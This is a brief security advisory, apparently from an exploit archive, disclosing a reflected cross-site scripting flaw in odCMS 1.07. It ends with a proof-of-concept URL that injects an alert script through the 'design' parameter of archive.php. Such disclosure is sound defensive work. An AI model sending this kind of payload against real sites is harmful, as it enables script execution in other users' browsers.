odCMS version 1.07 suffers from a cross site scripting vulnerability.
dce9734f950abe1db79c950191ef9740934e6a14b63204e055a30c4c46ef5157
------------------------------------------------------------------------
Software................odCMS 1.07
Vulnerability...........Reflected XSS
Download................http://odcms.org/index.php?Page=Download
Release Date............7/5/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
An XSS vulnerability in odCMS 1.07 can be exploited to
execute arbitrary JavaScript.
--PoC--
http://localhost/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E